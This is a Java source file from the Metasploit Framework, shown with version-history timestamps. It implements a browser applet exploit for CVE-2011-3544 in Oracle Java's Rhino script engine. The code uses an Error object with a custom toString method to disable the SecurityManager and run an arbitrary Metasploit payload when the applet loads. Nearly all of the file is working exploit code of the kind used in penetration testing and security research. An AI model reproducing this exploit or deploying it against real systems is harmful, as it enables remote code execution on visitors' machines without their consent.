metasploit-framework/external/source/exploits/CVE-2011-3544/Exploit.java

55 lines
1.6 KiB
Java
Raw Normal View History

2011-12-01 09:03:37 +00:00
/*
* Oracle Java Applet Rhino Script Engine Remote Code Execution
* CVE-2011-3544
* ZDI-11-305
*
* This vulnerability is due to the way Rhino error objects are handled. Normally the script engine
* has to ensure untrusted code not being allowed to perform, but a malicious attacker can actually
* bypass this by creating an error object (which isn't checked by Rhino Script Engine), with a
* custom 'toString()' method to allow code being run with full privileges. This also allows the
* attacker to disable Java SecurityManager, and then run abitrary code.
*
* Ref:
* http://schierlm.users.sourceforge.net/CVE-2011-3544.html
*/
2011-11-30 00:04:31 +00:00
import java.applet.Applet;
import javax.script.*;
import javax.swing.JList;
import metasploit.Payload;
public class Exploit extends Applet {
public void init() {
try {
2011-12-01 09:03:37 +00:00
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
2011-11-30 00:04:31 +00:00
b.put("applet", this);
2011-12-01 09:03:37 +00:00
// Disable SecurityManager, and then run the payload
// The error object isn't handled by Rhino, so the toString method
// will not be restricted by access control
Object proxy = (Object) engine.eval(
"this.toString = function() {" +
" java.lang.System.setSecurityManager(null);" +
" applet.callBack();" +
" return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
"};" +
"e = new Error();" +
"e.message = this;" +
"e", b);
JList list = new JList(new Object[] {proxy});
this.add(list);
}
catch (ScriptException e) {
e.printStackTrace();
2011-11-30 00:04:31 +00:00
}
}
2011-12-01 09:03:37 +00:00
2011-11-30 00:04:31 +00:00
public void callBack() {
try {
Payload.main(null);
2011-12-01 09:03:37 +00:00
}
catch (Exception e) {}
2011-11-30 00:04:31 +00:00
}
2011-12-01 09:03:37 +00:00
}